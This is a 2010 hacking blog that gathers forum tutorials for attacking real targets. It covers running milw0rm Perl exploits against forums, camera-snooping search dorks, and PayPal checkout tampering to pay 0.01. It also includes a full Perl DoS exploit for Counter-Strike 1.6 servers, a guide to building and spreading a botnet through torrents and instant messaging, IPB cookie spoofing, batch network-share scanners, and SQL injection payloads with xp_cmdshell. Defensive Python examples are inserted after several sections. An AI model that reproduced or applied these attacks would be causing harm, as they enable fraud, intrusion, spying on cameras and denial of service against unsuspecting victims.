NOTE: Some drives require a password. You're on your own there.

Tuesday, March 16, 2010

How to use a perl exploit

How to use a perl exploit
What you will need:
ActivePerl: http://www.activestate.com/Products/ (it is easier to just download the trial, unless you want the full version)
http://www.milw0rm.com (to search for a exploit)
NotePad
Command Prompt (start>run>CMD)
=================================================================
First: Download and install ActivePerl from the link I gave you.
=================================================================
Ok, second, search on Google for some forums. Make sure you find out as much about the one you want to hack as possible (e.g. the version and things). As I said, find out as much as you can about it.
=================================================================
Now, go to http://www.milw0rm.com and search for an exploit that is for your website (e.g. MyBB 1.2.3 or something). Once you have your exploit, click the link and see if it is Perl code. To know if it is Perl code, it should have something like #!\perl\bin or something along those lines.
=================================================================
Once you have your code, copy and paste everything on the sheet into NotePad. Once you have it all pasted, save it into "C:\perl\bin" (without quotes). Make sure you save it as a .pl file (e.g. exploit1.pl), otherwise it will not work. You can name it whatever you want, just make sure it is a .pl file.
=================================================================
Now, after you have saved your file in C:\perl\bin, go to Start>Run>CMD (Command Prompt). Type in on CMD "cd C:\perl\bin". Once you have done that, it will go into the folder pretty much on CMD. So, once you are in it, type "exploit1.pl" or whatever you named your exploit. Most of the exploits have instructions that come with them, so it is pretty much self explanatory. If you do not know what your exploit does, .
=================================================================

How to Snoop Security Cams

Here’s something fun to do when you’re bored. Use the code below into a search engine and see what you can come up with. You can find all sorts of stuff from cameras all over the world. Happy snooping!
  • inurl:”ViewerFrame?Mode=
  • intitle:Axis 2400 video server
  • inurl:/view.shtml
  • intitle:”Live View / - AXIS” | inurl:view/view.shtml^
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg
  • inurl:axis-cgi/mjpg (motion-JPEG)
  • inurl:view/indexFrame.shtml
  • inurl:view/index.shtml
  • inurl:view/view.shtml
  • liveapplet
  • intitle:”live view” intitle:axis
  • intitle:liveapplet
  • allintitle:”Network Camera NetworkCamera”
  • intitle:axis intitle:”video server”
  • intitle:liveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View / - AXIS”
  • intitle:”Live View / - AXIS 206M”
  • intitle:”Live View / - AXIS 206W”
  • intitle:”Live View / - AXIS 210?
  • inurl:indexFrame.shtml Axis
  • inurl:”MultiCameraFrame?Mode=Motion”
  • intitle:start inurl:cgistart
  • intitle:”WJ-NT104 Main Page”
  • intext:”MOBOTIX M1? intext:”Open Menu”
  • intext:”MOBOTIX M10? intext:”Open Menu”
  • intext:”MOBOTIX D10? intext:”Open Menu”
  • intitle:snc-z20 inurl:home/
  • intitle:snc-cs3 inurl:home/
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1?
  • intitle:”sony network camera snc-m1?
  • site:.viewnetcam.com -www.viewnetcam.com
  • intitle:”Toshiba Network Camera” user login
  • intitle:”netcam live image”
  • intitle:”i-Catcher Console - Web Monitor”

How to get stuff for 0.01 Paypal Hacking

First of all you will need:
Firefox
[CODE]http://www.mozilla.org/en/products/firefox/[/CODE]
Tamper data
[CODE]https://addons.mozilla.org/en-US/firefox/addon/966[/CODE]
a Paypal account
[CODE]http://www.paypal.com[/CODE]
Ok so go to the checkout then start tamper then click Paypal link then something will pop up select tamper and on the amount and change it to 0.01 then press ok then stop tampering and pay 0.01 LOL
Youtube video about it
Say thanks if you like my post.
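The trick above only works when the merchant marks an order as paid on the strength of whatever amount comes back from the client side. Below is an added Python example, not code from the post and not PayPal's own API, showing the vulnerable decision beside the server-side check that defeats it: the order total is stored when the order is created, and the payment notification is accepted only if its amount and currency match that stored total. The order store and the `notification` dict shape are constructed for the example.

```python
from decimal import Decimal, InvalidOperation

def sample_orders():
    """Constructed order store standing in for the merchant database
    (assumption: each order carries the server-side total and currency)."""
    return {
        "order-1001": {"total": Decimal("49.99"), "currency": "USD", "paid": False},
        "order-1002": {"total": Decimal("5.00"), "currency": "EUR", "paid": False},
    }

def vulnerable_confirm(orders, order_id, notification):
    """The flaw the tutorial abuses: any positive amount reported back by
    the gateway is treated as settling the order."""
    order = orders[order_id]
    if Decimal(str(notification["amount"])) > 0:
        order["paid"] = True
        return True
    return False

def hardened_confirm(orders, order_id, notification):
    """Settles the order only when the reported amount and currency match
    the total the server stored when the order was created.  The price
    field that travelled through the browser is never used for this."""
    order = orders.get(order_id)
    if order is None or order["paid"]:
        return False                      # unknown order, or replayed notification
    try:
        amount = Decimal(str(notification["amount"]))
    except (InvalidOperation, TypeError, KeyError):
        return False
    if notification.get("currency") != order["currency"]:
        return False
    if amount != order["total"]:
        return False                      # mismatch: hold for review, do not fulfil
    order["paid"] = True
    return True

if __name__ == "__main__":
    tampered = {"amount": "0.01", "currency": "USD"}
    print(vulnerable_confirm(sample_orders(), "order-1001", tampered))  # True
    print(hardened_confirm(sample_orders(), "order-1001", tampered))    # False
```

The same comparison belongs wherever the gateway reports back (return URL or asynchronous notification), and the notification itself should be authenticated before its fields are trusted.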

How to crash a CS 1.6 server tutorial

How to crash a CS 1.6 server
Alright so I decided to write this tut because I wanted to contribute a bit to the forums and there are many people asking how to do this. Actually, crashing a CS 1.6 server DOES NOT demand a botnet or many people attacking or logging in the server. So:
-Things to bear in mind:
1) The server you want to crash must NOT be running Steam. And this is
because all servers that run Steam have HLShield, HLGuard or other
types of shields that protect the servers from attacks of this type. So
before you continue, make sure the server does not run Steam or in
general is not Valve-secured. You can usually check this like this:
Can you see something in a green box? This means that the server is
most likely using the shield I described earlier. You can't crash it the way
I am going to describe.
2) Sometimes if you are banned from the server or the server is password-
protected, you cant crash it.
-What you will need:
1) (Latest) version of Perl installed on your machine, I recommend
ActivePerl, but you can use Strawberry Perl too (that's what I used).
2) The exploit you are going to use, located here:
http://www.milw0rm.com/exploits/1483
3) A clear mind.
4) Access to the so called "cmd" or command prompt.
So lets begin.
1) Go to the link I provided earlier in this tut and copy the whole code into
notepad by pressing Ctrl-A, opening Notepad and pressing Ctrl-V to
paste it.
2) Save the file. File > Save As... Now be careful with the name of the file
and the extension. Name it whatever you like, but add ".pl" as the
extension of the file. For example, if you are going to name it "csdos",
then in the name of the file you are going to type: "csdos.pl". Save it on
your desktop for now.
3) Move the file you just created to this path: "C:\strawberry\perl\bin" if you
installed Strawberry Perl, or this: "C:\perl\bin" if you chose Active Perl.
4) You're almost done now. Go into a server and get its IP. You can do this
by right-clicking the server, "View Server Info". Now when you have its
IP, press the Windows Key to minimize CS and open cmd. Start > Run...
and type in: "cmd". A command prompt window pops up. Type in:
"cd c:\strawberry\perl\bin" (if you installed Strawberry Perl) or
"cd c:\perl\bin" (if you installed ActivePerl).
5) Now for the command syntax:
"perl [name of your file].pl [IP of the server]"
For example, if you named the file "csdos" and the IP of the server is
215.75.156.83:27015, the command would be:
"perl csdos.pl 215.75.156.83:27015".
6) Determine the result.
If you get something like this in the red box, then the server was crashed successfully. Congrats! If you get anything different than this, then you failed. xD
- End of my tutorial -
P.S. Don't forget to comment and rate my tut, it took me much time to write, plus my Firefox crashed twice while I was writing it, so I wrote everything from scratch.
And feel free to ask questions.
UPDATE: This is the code you are going to use:
#!/usr/bin/perl
# Server must not be running steam. /str0ke
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos " unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
# milw0rm.com [2006-02-11]
The reason i posted it is because there seems to be some trouble and errors on executing it...
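From the server operator's side, the Perl above shows what this traffic looks like on the wire: out-of-band UDP datagrams that start with four 0xff bytes, a `getchallenge` request, then a `connect` line carrying a NUL-terminated, oddly quoted userinfo string, sent twice at once from the same address. The following is an added Python example, not part of the post or of the milw0rm code and not the engine's own parser, that inspects captured datagrams and raises alerts on those two traits. The malformation heuristics (embedded NUL, odd number of unescaped quotes) and the per-source connect threshold are assumptions of this example; the sample packets are constructed.

```python
import re
from collections import defaultdict

OOB = b"\xff\xff\xff\xff"   # out-of-band prefix, as in the Perl above

def parse_oob(packet):
    """Split an out-of-band UDP payload into (command, rest).
    Returns None for packets without the four-0xff prefix."""
    if not packet.startswith(OOB):
        return None
    cmd, _, rest = packet[len(OOB):].partition(b" ")
    return cmd, rest

def malformed_connect(rest):
    """Assumed heuristics for a malformed connect line: embedded NUL bytes,
    or an odd number of unescaped double quotes.  These are this example's
    checks, not the engine's own parsing rules."""
    reasons = []
    if b"\x00" in rest:
        reasons.append("embedded NUL")
    if len(re.findall(rb'(?<!\\)"', rest)) % 2:
        reasons.append("unbalanced quotes")
    return reasons

def inspect(packets, max_connects=2, window=5.0):
    """packets: iterable of (timestamp, source_ip, payload).  Returns a list
    of (source_ip, reason) alerts: one per malformed connect, plus a
    'connect flood' alert once a source exceeds max_connects connect
    requests within `window` seconds."""
    alerts = []
    recent = defaultdict(list)
    for ts, src, payload in packets:
        parsed = parse_oob(payload)
        if parsed is None or parsed[0] != b"connect":
            continue
        for reason in malformed_connect(parsed[1]):
            alerts.append((src, reason))
        recent[src] = [t for t in recent[src] if ts - t <= window] + [ts]
        if len(recent[src]) > max_connects:
            alerts.append((src, "connect flood"))
    return alerts

def sample_packets():
    """Constructed traffic: one well-formed connect from 10.0.0.5 and three
    rapid malformed connects (NUL-terminated, stray quote) from 10.0.0.9."""
    good = (OOB + b'connect 47 123456 "\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\abc" '
            b'"\\name\\Player\\rate\\25000"')
    bad = OOB + b'connect 47 123456 "\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\abc""\\"\x00\x00'
    return [
        (0.0, "10.0.0.5", OOB + b"getchallenge"),
        (0.1, "10.0.0.5", good),
        (1.0, "10.0.0.9", OOB + b"getchallenge"),
        (1.1, "10.0.0.9", bad),
        (1.2, "10.0.0.9", bad),
        (1.3, "10.0.0.9", bad),
    ]

if __name__ == "__main__":
    for alert in inspect(sample_packets()):
        print(alert)
```

Feeding real captures means extracting the UDP payload per datagram from pcap; the thresholds should be tuned against the server's normal join rate before they drive any blocking.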

Host Booting (Botnet) Tutorial

Host Booting (Botnet) Tutorial
Ok, im going to show you guys how to, setup a private DNS, and show you how to configure/Hex your bot to connect to your host/ip, then spread it to be able to shut down someones internet. This is most commonly used on Halo2, Halo3, and other games for the Xbox360.
Also spreading is easier if you have a good binder/packer a FUD packer would work great. If you want the spreading process to be a lot easier, i recommend buying a copy of Evo Packer from SiKWoN.
1. Setting up your DNS
First go to [url]www.No-IP.com[/url] and register. Make sure you use REAL information and a real email address. After you have made an account with No-IP, go to "Add Host" Once your their you should make your host name similar to mine. 2 LETTERS and 1 NUMBER, doesnt matter what they are. Overall, should look like this :
Now click "Create Host" then your done setting up your DNS server.
2. Setting up your Bot to connect to your server.
[url]http://www.hexworkshop.com/[/url]
Download HexWorkshop. Then you'll need a blank copy of a bot
Now, once you have HexWorkshop Installed you extract the bot from the .rar file, right click the bot and click "Open with HexWorkshop" Hex workshop should come up. now hit CTRL + F, then it should bring up a screen. You want to take the drop down bar and select "Text String" and click on the bubble "Find all Instances" And you want to search for "no-ip" without the "s. Should look like this.
Once thats done, you should see down at the bottom right, letters and numbers, click on that and should show up highlights No-ip. Remember that host you made? heres where it comes in handy, you take your 2 letters and 1 number and put them where i put my ch8. but instead of ch8, you put your host name. After that go to file > Save > when it asks to make a backup, No.
3. Protecting your Bot with Armadillo.
Theres Armadillo/Settings for Protection/Patch.
Once you have that downloaded and Installed, you want to, double click on the project.arm file. it should bring up Armadillo.
Then go to Protection at the top.Then Edit Project.
Then click on "Files to Protect" then to the far right, you should see bars with boxes next to them, on the first one click the box on the right, then find your extraced 2.1 XR Bot. Select the bot. then exit out of the screen. Once done with selecting the file to protect time to protect your bot.
It will tell you when its done protecting your files. And there you go! your bot is now setup for your server and is protected so no one can get your server information.
4.Opening your ports.
1. Login to your router.
2. Port Forwarding/Applacations and Gaming
3. OPEN PORT 3070, UDP and TCP, USE THE IP OF YOUR ROUTER!
5. Spreading.
Torrents are a good way of spreading, just rename your bot, make a decent torrent name, and upload. once people download your file you will get more "Zombies" and once you have enough zombies you can make people lag out of halo games or lag people completely offline. Also if you have a massive amount of zombies, there is a chance their router/modem will fry/overheat and they will have to buy a new one.
LimeWire - P2P rename it as a song, bind it with a song. Either way, someone will download it.
MSN and AIM. Lie to people (which is gay) have them open it, and they will be your bot. I dont recommend doing this way though. Because i personally dont like screwing people over. Just help them if they need it.

Hacking IPB tut (with pics)

Well There are so many ways to hack "Powered by invision power board" . But Im going to use the easy one .. ok lets start
What we need?
Opera(web browser) : http://www.opera.com/download/
Perl : http://downloads.activestate.com/ActivePerl/releases/5.10.1.1007/
Exploit : http://hotfile.com/dl/32738317/f30816e/Exploit_Package.rar.html
NOTE: MAKE SURE YOU HAVE THE RIGHT VERSION OF PERL, or else youll get an error, and its a pain, trust.
Lets Start
1st you have to install Opera and perl
and after that run the Exploit with perl . and then you will get something like this
ok this will Work on
Powered by invision power board v2.1.4
Powered by invision power board v2.1.5
Powered by invision power board v2.1.6
Powered by invision power board v2.1.3
so lets find a website
goto google and type one of those in the top
and you will get bunch of sites choose one
and paste the link to forum in " Path to forum index" And click "Test forum vulnerability"
If the site isnot vulnerable, it will give something like this:
if the site is vulnerable it will give something like this :
Now change the User ID to admins ID most of times user id will be 1 or 2
if everything is good click "Get date from database"
a hash should pop up where it says "Returned date:" (note: you can't crack this hash, you can only cookie spoof; all the hashes will be salted)
Now you have the hash ! now whats left to do is to login in with admin or whatever user you choose.
ok now you have to fucking pay attention, its not that hard.
Using Opera (just in case you forgot its your web browser (: ) First go to your vulnerable website and register enter all the information needed preferably not entering real info. ( if your not a retard )
Set a random username like : plorlt
set an email like: [email]a@hotmail.com[/email] (it doesn't have to be real, I have a way of getting it without doing the email verify)
when it says an email has been sent to blabla just go back to the forum index and login.
When your in go to tools>advanced>cookies? now you need to find the vulnerable sites cookie you need to be logged in !
When you get to that cookie simple open the file and edit the Hash with the one you got with the exploit, and edit the member_id to whichever one you use to get the hash.
Then delete everything else in the cookie only member_id and hash is needed.
Click close and refresh the page you should be logged in as your target !
Opera is the most convenient web browser, and use ur dam brain, and u caaaannn duu ihthttttt
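The cookie spoofing in this post works because the forum's login cookie is nothing more than `member_id` plus the stored password hash, so anyone who reads the hash out of the database is also holding a valid session. The added Python example below (not the forum's code, and not a description of any particular board's real implementation) contrasts that design with a server-side session store: login issues a random token, the server keeps only a digest of it with an expiry, and the password hash never leaves the database, so a leaked hash cannot be turned into a cookie. The user table and the cookie field names are constructed for the example.

```python
import hashlib
import secrets
import time

def sample_users():
    """Constructed user table: member_id -> stored password hash.
    (Assumption: an unsalted md5 stands in for the forum's hash; the point
    is that whatever the hash is, it must not double as a login credential.)"""
    return {1: hashlib.md5(b"admin-password").hexdigest(),
            42: hashlib.md5(b"plorlt-password").hexdigest()}

def weak_cookie_login(users, cookie):
    """The scheme the tutorial abuses: the cookie carries member_id and the
    stored hash, so anyone who learns the hash can forge the cookie."""
    uid = int(cookie["member_id"])
    return uid if users.get(uid) == cookie["pass_hash"] else None

class SessionStore:
    """Hardened alternative: a random token issued at login, kept server-side
    as a digest, with expiry.  Nothing in the database yields a usable token."""

    def __init__(self, ttl=3600):
        self.ttl = ttl
        self.sessions = {}          # sha256(token) -> (member_id, expires_at)

    @staticmethod
    def _key(token):
        # Store only a digest so a database dump does not contain live tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, member_id, now=None):
        """Called after the password check succeeds; returns the cookie value."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)          # 256 bits of randomness
        self.sessions[self._key(token)] = (member_id, now + self.ttl)
        return token

    def lookup(self, token, now=None):
        """Resolve a presented cookie to a member_id, or None if unknown/expired."""
        now = time.time() if now is None else now
        entry = self.sessions.get(self._key(token))
        if entry is None:
            return None
        member_id, expires = entry
        if now > expires:
            del self.sessions[self._key(token)]
            return None
        return member_id

    def revoke(self, token):
        """Logout: drop the server-side record; the cookie is useless afterwards."""
        self.sessions.pop(self._key(token), None)

if __name__ == "__main__":
    users = sample_users()
    leaked = users[1]                                   # what the injection returned
    print(weak_cookie_login(users, {"member_id": "1", "pass_hash": leaked}))  # 1
    store = SessionStore()
    print(store.lookup(leaked))                         # None: hash is not a token
```

A password change should also invalidate every session of that member, which the store supports by deleting all entries whose member_id matches.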

Hacker Mags you Might Not Know About

Ok, you may have heard of (or Read) of the "Hacker Mag" 2600. Basically it is an "underground" (I am using that term very loosely) magazine related to the hacker scene. Well you may not know it, but there are a lot of other hacker magazines out there. I have listed the ones I know about (both print and E-Zines) hopefully there will be some that you may have not heard about.
* PRINTED MAGAZINES
2600
http://www.2600.com
Pretty much the most "mainstream" hacker mag. I don't really have a strong opinion on this mag either way.. Probably don't have to talk much about it, as I am sure most of you have read it before.
Blacklisted 411
http://www.blacklisted411.com
Old-school mag that is back in print.. I just got my first issue (didn't know it came back) and so far I really like it. Very technical & a lot of hardware projects. Probably my favorite out of the bunch..
BinaryRevolution
http://www.binrev.com/
I have just read through the 3 releases, and so far really like it. Seems to be like 2600 back in the day. Probably a close 2nd in order of my favorites; they don't have a set "release" time, they release it as they have material.
MakeZine
http://make.oreilly.com/
If you like to tweak, disassemble, re-create, and invent cool new uses for technology, you'll love MAKE our new quarterly publication for the inquisitive do-it-yourselfer. Every issue is packed with projects to help you make the most of all the technology in your life.
Radical Future
http://www.radicalfuture.tk
Checking it out now, so far its pretty good because you can d/l pdf's of the mag..
Dig
http://digzine.com
Deals with Technology, Art, & science. Available online as well.
Infiltration
http://www.infiltration.org/zine.html
A zine about going places you're not supposed to go; a paper publication devoted to the art of urban exploration.
Adbusters
http://adbusters.org
* E-Zines
Phrack
http://www.phrack.com/
The classic Hacker Zine. Unfortunately #63 will be the last..
"Since 1985, PHRACK MAGAZINE has been providing the hacker community with information on operating systems, network technologies and telephony, as well as relaying features of interest for the international computer underground."
UPL
http://phonelosers.org/upl/index.html
Phonelosers.org's phreak & prank zine
Telecomunists
http://telecom-munist.phonelosers.org
Another Phonelosers related phreak zine, might be dead..
Phreakazoid
http://www.phreaksandgeeks.com/
Another "might be dead" phreaking zine

Getting Someones IP Address,

Open notepad.exe and then copy and paste this script save it as netview.bat
echo off
prompt ~
IF EXIST C:\a\ del /q C:\a\*
IF NOT EXIST C:\a\ mkdir C:\a\
cls
echo.
echo.
echo.
echo TYPE THE IP ADRESS IN THE FORM (w.x.y.z)
echo.
echo.
echo w=
set /p w=
echo x=
set /p x=
echo y=
set /p y=
echo z=
set /p z=
set count=0
:10
set ipadd=%w%.%x%.%y%.%z%
cls
echo %ipadd%
REM --------- CHECKING IP TO SEE IF ONLINE
ping -n 1 -l 10 -f -w 1 %w%.%x%.%y%.%z% >> C:\ping5.txt
findstr "Reply" C:\ping5.txt
If %errorlevel% EQU 0 GOTO :NETVIEW
del C:\ping5.txt
:IPCOUNTER
set /a count=%count%+1
If %w% EQU 255 If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (cls && echo The number of combinations is %count%)
If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (Set /a w=%w%+1 && Set x=0 && Set y=0 && Set z=0 && goto :10)
If %y% EQU 255 If %z% EQU 255 (Set /a x=%x%+1 && Set y=0 && Set z=0 && goto :10)
If %z% EQU 255 (Set /a y=%y%+1 && Set z=0 && goto :10)
set /a z=%z%+1
GOTO :10
:NETVIEW
del C:\ping5.txt
echo ^e^cho off >> C:\a\view%w%.%x%.%y%.%z%.bat
echo net view \\%w%.%x%.%y%.%z% ^>^> F:\a\view%w%.%x%.%y%.%z%.txt >> C:\a\view%w%.%x%.%y%.%z%.bat
echo exit >> C:\a\view%w%.%x%.%y%.%z%.bat
start C:\a\view%w%.%x%.%y%.%z%.bat
GOTO :IPCOUNTER
---------------------------------------------------------------
this one too
Save it as search.bat
echo off
prompt ~
cls
echo.
echo.
echo.
echo TYPE THE STARTING IP ADRESS IN THE FORM (w.x.y.z)
echo.
echo.
echo w=
set /p w=
echo x=
set /p x=
echo y=
set /p y=
echo z=
set /p z=
set count=0
:10
echo C:\a\view%w%.%x%.%y%.%z%.txt
IF EXIST C:\a\view%w%.%x%.%y%.%z%.txt GOTO :FIND
:BACK
del C:\a\view%w%.%x%.%y%.%z%.txt
del C:\a\view%w%.%x%.%y%.%z%.bat
set /a count=%count%+1
If %w% EQU 255 If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (cls && echo The number of combinations is %count%)
If %x% EQU 255 If %y% EQU 255 If %z% EQU 255 (Set /a w=%w%+1 && Set x=0 && Set y=0 && Set z=0 && goto :10)
If %y% EQU 255 If %z% EQU 255 (Set /a x=%x%+1 && Set y=0 && Set z=0 && goto :10)
If %z% EQU 255 (Set /a y=%y%+1 && Set z=0 && goto :10)
set /a z=%z%+1
cls
GOTO :10
:FIND
FINDSTR Share C:\a\view%w%.%x%.%y%.%z%.txt
If %errorlevel% EQU 0 echo %w%.%x%.%y%.%z% >> C:\SHAREIP.txt
IF %ERRORLEVEL% EQU 0 type C:\a\view%w%.%x%.%y%.%z%.txt >> C:\hackme.txt
GOTO :BACK
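Seen from the network being scanned, the two batch files above produce a recognisable pattern: one source pings consecutive addresses one after another, then opens SMB sessions (what `net view` does) to whichever hosts replied. The following added Python example, not part of the original post, runs that detection over constructed firewall-style log lines: it flags any source that sends ICMP echo requests to many distinct hosts within a short window and lists the SMB follow-ups from the same source. The log format, thresholds and addresses are assumptions of the example.

```python
import re
from collections import defaultdict

# Assumed log format (constructed for this example; real firewall formats differ):
#   <epoch> <PROTO> <src> -> <dst>[:<dport>] <info>
LINE_RE = re.compile(
    r"^(?P<ts>\d+) (?P<proto>\w+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+)"
    r"(?::(?P<dport>\d+))? (?P<info>.+)$")

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = int(ev["ts"])
    ev["dport"] = int(ev["dport"]) if ev["dport"] else None
    return ev

def detect_sweeps(lines, min_hosts=8, window=10):
    """Return {src: details} for sources that sent ICMP echo requests to at
    least min_hosts distinct destinations within `window` seconds.  SMB
    connections (TCP/139 or 445) from the same source are listed alongside,
    since 'net view' against each responding host rides on those ports."""
    icmp = defaultdict(list)
    smb = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["proto"] == "ICMP" and ev["info"] == "echo-request":
            icmp[ev["src"]].append((ev["ts"], ev["dst"]))
        elif ev["proto"] == "TCP" and ev["dport"] in (139, 445):
            smb[ev["src"]].add(ev["dst"])
    alerts = {}
    for src, events in icmp.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            # distinct hosts pinged in the window starting at this event
            hosts = {dst for t, dst in events[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts[src] = {"hosts": len(hosts), "first_seen": t0,
                               "smb_followups": sorted(smb.get(src, ()))}
                break
    return alerts

def sample_log():
    """Constructed lines: 192.168.1.50 pings 10.0.0.1-12 in three seconds and
    then opens SMB to the one host that answered; 192.168.1.60 pings one host."""
    base = 1268812800
    lines = [f"{base + i // 4} ICMP 192.168.1.50 -> 10.0.0.{i} echo-request"
             for i in range(1, 13)]
    lines.append(f"{base + 5} TCP 192.168.1.50 -> 10.0.0.7:445 syn")
    lines.append(f"{base + 9} ICMP 192.168.1.60 -> 10.0.0.3 echo-request")
    lines.append("this line is not in the expected format")
    return lines

if __name__ == "__main__":
    for src, details in detect_sweeps(sample_log()).items():
        print(src, details)
```

The distinct-host count matters more than the raw packet count: a single host being pinged repeatedly is a health check, a dozen neighbours in a few seconds is a sweep.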

Detailed Sql Injection tut

No I did not write this. I was trolling around and found this a bit useful so im sharing it here. Creds to the one who made this tut.
====================
SQL Injection
It's a trick to inject an SQL query (command) as input, possibly through web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes the user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
You can do this with any Browser.
What you should look for?
Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:
Everything between the <FORM> and </FORM> tags has potential parameters that might be useful (exploit wise).
What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
http://duck/index.asp?id=10
How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
If luck is on your side, you will get login without any login name or password.
But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query should now select everything from the product table regardless of whether PCategory is equal to 'food' or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets on 10.10.1.2 and check whether any packet arrives from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must have a folder "share" shared for Everyone.
How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching pattern '%25login%25' will be seen as %login% in SQL Server. In this case, we get the first table name that matches the criteria, "admin_login".
How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
